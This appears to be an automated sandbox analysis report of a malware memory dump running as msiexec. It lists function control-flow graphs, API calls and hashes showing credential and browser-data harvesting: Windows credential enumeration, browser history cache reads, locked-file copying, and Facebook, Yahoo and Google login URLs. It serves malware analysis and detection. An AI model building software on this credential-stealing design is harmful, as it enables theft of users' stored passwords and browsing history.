                                                                                                                                                control_flow_graph 505 40e2ab-40e2ce call 40695d call 406b90 509 40e2d3-40e2d5 505->509 510 40e4a0-40e4af call 4069a3 509->510 511 40e2db-40e300 509->511 513 40e304-40e316 call 406e8f 511->513 517 40e476-40e483 call 406b53 513->517 518 40e31c-40e39b call 40dd50 * 7 memset call 40aa29 513->518 524 40e302 517->524 525 40e489-40e495 call 40aa04 517->525 542 40e3c9-40e3ce 518->542 543 40e39d-40e3ae call 40742e 518->543 524->513 525->510 531 40e497-40e49f free 525->531 531->510 545 40e3d0-40e3d6 542->545 546 40e3d9-40e3de 542->546 550 40e3b0 543->550 551 40e3b3-40e3c1 wcschr 543->551 545->546 548 40e3e0-40e3f1 memcpy 546->548 549 40e3f4-40e3f9 546->549 548->549 552 40e3fb-40e40c memcpy 549->552 553 40e40f-40e414 549->553 550->551 551->542 554 40e3c3-40e3c6 551->554 552->553 555 40e416-40e427 memcpy 553->555 556 40e42a-40e42f 553->556 554->542 555->556 557 40e431-40e442 memcpy 556->557 558 40e445-40e44a 556->558 557->558 559 40e44c-40e45b 558->559 560 40e45e-40e463 558->560 559->560 560->517 561 40e465-40e469 560->561 561->517 562 40e46b-40e473 561->562 562->517
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                                                                                                  • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                                                                                                • free.MSVCRT ref: 0040E49A
                                                                                                                                                  • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                                                                                • memset.MSVCRT ref: 0040E380
                                                                                                                                                  • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                                                                                                  • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                                                                                                                • wcschr.MSVCRT ref: 0040E3B8
                                                                                                                                                • memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,74DF2EE0), ref: 0040E3EC
                                                                                                                                                • memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,74DF2EE0), ref: 0040E407
                                                                                                                                                • memcpy.MSVCRT(?,-00000220,00000008,0044E518,00000000,00000000,74DF2EE0), ref: 0040E422
                                                                                                                                                • memcpy.MSVCRT(?,-00000220,00000008,0044E518,00000000,00000000,74DF2EE0), ref: 0040E43D
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memcpy$_wcsicmpmemset$freewcschrwcslen
                                                                                                                                                • String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
                                                                                                                                                • API String ID: 3849927982-2252543386
                                                                                                                                                • Opcode ID: c30480054a5ca474dc40abe6212bc187cfeb1b733cbf080f7a891c76daa1d321
                                                                                                                                                • Instruction ID: 3bb3cf654da2d90f893253d259683e8481abe175d229eeda5eb464894a91a1db
                                                                                                                                                • Opcode Fuzzy Hash: c30480054a5ca474dc40abe6212bc187cfeb1b733cbf080f7a891c76daa1d321
                                                                                                                                                • Instruction Fuzzy Hash: DA512071E00309ABDF10EFA6DC45B9EB7B8AF54305F15443BA904F7291E678AA14CB58
                                                                                                                                                Function 004091B8 Relevance: 25.8, APIs: 16, Strings: 1, Instructions: 272COMMON
                                                                                                                                                Download Yara Rule

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 563 4091b8-40921b memset call 40a6e6 call 444432 568 409520-409526 563->568 569 409221-40923b call 40b273 call 438552 563->569 573 409240-409248 569->573 574 409383-4093ab call 40b273 call 438552 573->574 575 40924e-409258 call 4251c4 573->575 587 4093b1 574->587 588 4094ff-40950b call 443d90 574->588 580 40937b-40937e call 424f26 575->580 581 40925e-409291 call 4253cf * 2 call 4253af * 2 575->581 580->574 581->580 611 409297-409299 581->611 589 4093d3-4093dd call 4251c4 587->589 588->568 597 40950d-409511 588->597 598 4093b3-4093cc call 4253cf * 2 589->598 599 4093df 589->599 597->568 601 409513-40951d call 408f2f 597->601 598->589 615 4093ce-4093d1 598->615 603 4094f7-4094fa call 424f26 599->603 601->568 603->588 611->580 613 40929f-4092a3 611->613 613->580 614 4092a9-4092ba 613->614 616 4092bc 614->616 617 4092be-4092e3 memcpy memcmp 614->617 615->589 618 4093e4-4093fb call 4253af * 2 615->618 616->617 619 409333-409345 memcmp 617->619 620 4092e5-4092ec 617->620 618->603 628 409401-409403 618->628 619->580 623 409347-40935f memcpy 619->623 620->580 622 4092f2-409331 memcpy * 2 620->622 625 409363-409378 memcpy 622->625 623->625 625->580 628->603 629 409409-40941b memcmp 628->629 629->603 630 409421-409433 memcmp 629->630 631 4094a4-4094b6 memcmp 630->631 632 409435-40943c 630->632 631->603 634 4094b8-4094ed memcpy * 2 631->634 632->603 633 409442-4094a2 memcpy * 3 632->633 635 4094f4 633->635 634->635 635->603
                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 004091E2
                                                                                                                                                  • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                                                                • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                                                                                                                • memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
                                                                                                                                                • memcpy.MSVCRT(?,00000023,?), ref: 0040930C
                                                                                                                                                • memcpy.MSVCRT(?,?,00000010), ref: 00409325
                                                                                                                                                • memcmp.MSVCRT(00000000,0045A4E8,00000006), ref: 0040933B
                                                                                                                                                • memcpy.MSVCRT(?,00000015,?), ref: 00409357
                                                                                                                                                • memcpy.MSVCRT(?,?,00000010), ref: 00409370
                                                                                                                                                • memcmp.MSVCRT(00000000,004599B8,00000010), ref: 00409411
                                                                                                                                                • memcmp.MSVCRT(00000000,0045A500,00000006), ref: 00409429
                                                                                                                                                • memcpy.MSVCRT(?,00000023,?), ref: 00409462
                                                                                                                                                • memcpy.MSVCRT(?,?,00000010), ref: 0040947E
                                                                                                                                                • memcpy.MSVCRT(?,?,00000020), ref: 0040949A
                                                                                                                                                • memcmp.MSVCRT(00000000,0045A4F8,00000006), ref: 004094AC
                                                                                                                                                • memcpy.MSVCRT(?,00000015,?), ref: 004094D0
                                                                                                                                                • memcpy.MSVCRT(?,?,00000020), ref: 004094E8
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memcpy$memcmp$ByteCharMultiWidememset
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3715365532-3916222277
                                                                                                                                                • Opcode ID: a80c2ed2cd7725c5ba05b8bc3cd527f2b50e73a4ba521d2eda8c640b4e065994
                                                                                                                                                • Instruction ID: d5c0d9b4f94ac501fd0f2fb5594fd033b2d13f4c98b4255323c8c53c7695c3f7
                                                                                                                                                • Opcode Fuzzy Hash: a80c2ed2cd7725c5ba05b8bc3cd527f2b50e73a4ba521d2eda8c640b4e065994
                                                                                                                                                • Instruction Fuzzy Hash: DDA1BA71900605ABDB21EF65D885BAFB7BCAF44304F01043FF945E6282EB78EA458B59
                                                                                                                                                Function 0040E01E Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 120fileCOMMON
                                                                                                                                                Download Yara Rule

                                                                                                                                                Control-flow Graph

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
                                                                                                                                                  • Part of subcall function 0040DD85: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                                                                                                  • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                                                                                                  • Part of subcall function 0040DD85: CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                                                                                                                  • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                                                                                                  • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
                                                                                                                                                  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                                                                                                • OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                                                                                • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                                                                                • DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                                                                                                                • GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                                                                                  • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                                                                                                  • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                                                                                  • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                                                                                                  • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                                                                                • CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                                                                                • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                                                                                • WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                                                                                • UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                                                                                                • CloseHandle.KERNELBASE(?), ref: 0040E13E
                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 0040E143
                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 0040E148
                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 0040E14D
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: File$Handle$Close$CreateProcess$CurrentTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
                                                                                                                                                • String ID: bhv
                                                                                                                                                • API String ID: 4234240956-2689659898
                                                                                                                                                • Opcode ID: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                                                                                                                • Instruction ID: 69536691d8562172d0558c987aea6dfe4ed17d6a9a6de0cf2c6621a9a97a0e87
                                                                                                                                                • Opcode Fuzzy Hash: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                                                                                                                • Instruction Fuzzy Hash: 15412775800218FBCF119FA6CC489DFBFB9FF09750F148466F504A6250D7748A50CBA8
                                                                                                                                                Function 00413F4F Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 29libraryloaderCOMMON
                                                                                                                                                Download Yara Rule

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 692 413f4f-413f52 693 413fa5 692->693 694 413f54-413f5a call 40a804 692->694 696 413f5f-413fa4 GetProcAddress * 5 694->696 696->693
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                                                  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                                                                                                                • GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                                                                                                • GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                                                                                                • GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                                                                                                • GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                                                                • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                                                                                • API String ID: 2941347001-70141382
                                                                                                                                                • Opcode ID: f3462473bc82ea1c51451d3a028beeb45a1422339b7559a3bc587941b48753d6
                                                                                                                                                • Instruction ID: 7b3d606b7d389a8205b465373562f67d85acf78e859b2fe1c5436fc88fb80995
                                                                                                                                                • Opcode Fuzzy Hash: f3462473bc82ea1c51451d3a028beeb45a1422339b7559a3bc587941b48753d6
                                                                                                                                                • Instruction Fuzzy Hash: BBF03470840340AECB706F769809E06BEF0EFD8B097318C2EE6C557291E3BD9098DE48
                                                                                                                                                Function 004466F4 Relevance: 18.1, APIs: 12, Instructions: 134COMMON
                                                                                                                                                Download Yara Rule

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 697 4466f4-44670e call 446904 GetModuleHandleA 700 446710-44671b 697->700 701 44672f-446732 697->701 700->701 702 44671d-446726 700->702 703 44675b-4467aa __set_app_type __p__fmode __p__commode call 4153f2 701->703 705 446747-44674b 702->705 706 446728-44672d 702->706 711 4467ac-4467b7 __setusermatherr 703->711 712 4467b8-44680e call 4468f0 _initterm __wgetmainargs _initterm 703->712 705->701 707 44674d-44674f 705->707 706->701 709 446734-44673b 706->709 710 446755-446758 707->710 709->701 713 44673d-446745 709->713 710->703 711->712 716 446810-446819 712->716 717 44681e-446825 712->717 713->710 718 4468d8-4468dd call 44693d 716->718 719 446827-446832 717->719 720 44686c-446870 717->720 723 446834-446838 719->723 724 44683a-44683e 719->724 721 446845-44684b 720->721 722 446872-446877 720->722 726 446853-446864 GetStartupInfoW 721->726 727 44684d-446851 721->727 722->720 723->719 723->724 724->721 728 446840-446842 724->728 730 446866-44686a 726->730 731 446879-44687b 726->731 727->726 727->728 728->721 732 44687c-446894 GetModuleHandleA call 41276d 730->732 731->732 735 446896-446897 exit 732->735 736 44689d-4468d6 _cexit 732->736 735->736 736->718
                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: HandleModule_initterm$InfoStartup__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargs_cexitexit
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2827331108-0
                                                                                                                                                • Opcode ID: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
                                                                                                                                                • Instruction ID: 0e3254bf032efe29fc581ce6ca9889a5a3d5d0d8e47fd2ea34fa35870f4f4cb9
                                                                                                                                                • Opcode Fuzzy Hash: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
                                                                                                                                                • Instruction Fuzzy Hash: 9D51C474C41314DFEB21AF65D8499AD7BB0FB0A715F21452BE82197291D7788C82CF1E
                                                                                                                                                Function 0040C274 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 112COMMON
                                                                                                                                                Download Yara Rule

                                                                                                                                                Control-flow Graph

                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 0040C298
                                                                                                                                                  • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
                                                                                                                                                  • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
                                                                                                                                                  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                                                                                                • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                                                                                • wcschr.MSVCRT ref: 0040C324
                                                                                                                                                • wcschr.MSVCRT ref: 0040C344
                                                                                                                                                • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                                                                                • GetLastError.KERNEL32 ref: 0040C373
                                                                                                                                                • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
                                                                                                                                                • FindCloseUrlCache.WININET(?), ref: 0040C3B0
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstLast
                                                                                                                                                • String ID: visited:
                                                                                                                                                • API String ID: 1157525455-1702587658
                                                                                                                                                • Opcode ID: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                                                                                                                • Instruction ID: 6629d855392f08d41decd2a192e4b6579142cf3eaa95f33c860a05aa0b18639b
                                                                                                                                                • Opcode Fuzzy Hash: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                                                                                                                • Instruction Fuzzy Hash: DA417F71D00219ABDB10EF92DC85AEFBBB8FF45714F10416AE904F7281D7389A45CBA9
                                                                                                                                                Function 0040E175 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 91COMMON
                                                                                                                                                Download Yara Rule

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 763 40e175-40e1a1 call 40695d call 406b90 768 40e1a7-40e1e5 memset 763->768 769 40e299-40e2a8 call 4069a3 763->769 771 40e1e8-40e1fa call 406e8f 768->771 775 40e270-40e27d call 406b53 771->775 776 40e1fc-40e219 call 40dd50 * 2 771->776 775->771 782 40e283-40e286 775->782 776->775 787 40e21b-40e21d 776->787 783 40e291-40e294 call 40aa04 782->783 784 40e288-40e290 free 782->784 783->769 784->783 787->775 788 40e21f-40e235 call 40742e 787->788 788->775 791 40e237-40e242 call 40aae3 788->791 791->775 794 40e244-40e26b _snwprintf call 40a8d0 791->794 794->775
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                                                                                                • memset.MSVCRT ref: 0040E1BD
                                                                                                                                                  • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                                                                                                • free.MSVCRT ref: 0040E28B
                                                                                                                                                  • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                                                                                  • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
                                                                                                                                                  • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
                                                                                                                                                • _snwprintf.MSVCRT ref: 0040E257
                                                                                                                                                  • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                                                                  • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                                                                                  • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                                                                                  • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: free$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
                                                                                                                                                • String ID: $ContainerId$Container_%I64d$Containers$Name
                                                                                                                                                • API String ID: 2804212203-2982631422
                                                                                                                                                • Opcode ID: b10a6b133fecd4ba1fe00162e0f0d1ba32908353d1defd03a55daed51eef6c1a
                                                                                                                                                • Instruction ID: de93d03617a61f3aa6bbe184beafcfad76b4f566d35596b706efacabd7485ccb
                                                                                                                                                • Opcode Fuzzy Hash: b10a6b133fecd4ba1fe00162e0f0d1ba32908353d1defd03a55daed51eef6c1a
                                                                                                                                                • Instruction Fuzzy Hash: 74318272D002196ADF10EFA6DC45ADEB7B8AF04344F1105BFE508B3191DB38AE598F99
                                                                                                                                                Function 0040BB98 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 145COMMON
                                                                                                                                                Download Yara Rule

                                                                                                                                                Control-flow Graph

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                                                                  • Part of subcall function 0040CC26: CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                                                                                  • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                                                                                                                • memset.MSVCRT ref: 0040BC75
                                                                                                                                                • memset.MSVCRT ref: 0040BC8C
                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,0044E518,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040B7D4,?,?), ref: 0040BCA8
                                                                                                                                                • memcmp.MSVCRT(?,00000000,00000005,?,?,?,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE), ref: 0040BCD6
                                                                                                                                                • memcpy.MSVCRT(00000024,?,00000020,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD2B
                                                                                                                                                • LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD3D
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memset$ByteCharCloseFileFreeHandleLocalMultiSizeWide_wcsicmpmemcmpmemcpy
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 115830560-3916222277
                                                                                                                                                • Opcode ID: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                                                                                                                • Instruction ID: 00a8249a540342db609c93f8c1f67c79963b4134db5221072d0e6ece1bb2d715
                                                                                                                                                • Opcode Fuzzy Hash: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                                                                                                                • Instruction Fuzzy Hash: 3F41B372900219ABDB10ABA5CC85ADEB7ACEF04314F01057BB509F7292D7789E45CA99
                                                                                                                                                Function 0040C768 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 87COMMON
                                                                                                                                                Download Yara Rule

                                                                                                                                                Control-flow Graph

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                                                                                                                  • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                                                                                                                  • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                                                                                                                                  • Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
                                                                                                                                                  • Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                                                                                  • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
                                                                                                                                                  • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
                                                                                                                                                  • Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                                                                                  • Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373
                                                                                                                                                  • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
                                                                                                                                                  • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                                                                                                  • Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
                                                                                                                                                  • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
                                                                                                                                                  • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                                                                                                • _wcslwr.MSVCRT ref: 0040C817
                                                                                                                                                  • Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
                                                                                                                                                  • Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF
                                                                                                                                                • wcslen.MSVCRT ref: 0040C82C
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memset$free$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
                                                                                                                                                • String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
                                                                                                                                                • API String ID: 2936932814-4196376884
                                                                                                                                                • Opcode ID: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                                                                                                                • Instruction ID: 5b72bd72183a146cc5fb8da473a5bce975bbff0c760a192580a28ed18ba85502
                                                                                                                                                • Opcode Fuzzy Hash: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                                                                                                                • Instruction Fuzzy Hash: 42218272A00244A6CF10BB6A9C8589E7B68EF44744B10457BB804B7293D67CDE85DB9D
                                                                                                                                                Function 0040BDB0 Relevance: 12.2, APIs: 8, Instructions: 151COMMON
                                                                                                                                                Download Yara Rule

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 886 40bdb0-40bdce call 404363 889 40bf63-40bf6f call 40440c 886->889 890 40bdd4-40bddd 886->890 892 40bdee 890->892 893 40bddf-40bdec CredEnumerateW 890->893 894 40bdf0-40bdf2 892->894 893->894 894->889 896 40bdf8-40be18 call 40b2cc wcslen 894->896 899 40bf5d 896->899 900 40be1e-40be20 896->900 899->889 900->899 901 40be26-40be42 wcsncmp 900->901 902 40be48-40be77 call 40bd5d call 404423 901->902 903 40bf4e-40bf57 901->903 902->903 908 40be7d-40bea3 memset 902->908 903->899 903->900 909 40bea5 908->909 910 40bea7-40beea memcpy 908->910 909->910 911 40bf11-40bf2d wcschr 910->911 912 40beec-40bf06 call 40b2cc _wcsnicmp 910->912 914 40bf38-40bf48 LocalFree 911->914 915 40bf2f-40bf35 911->915 912->911 917 40bf08-40bf0e 912->917 914->903 915->914 917->911
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                                                                                                                  • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                                                                                                                  • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                                                                                                                  • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
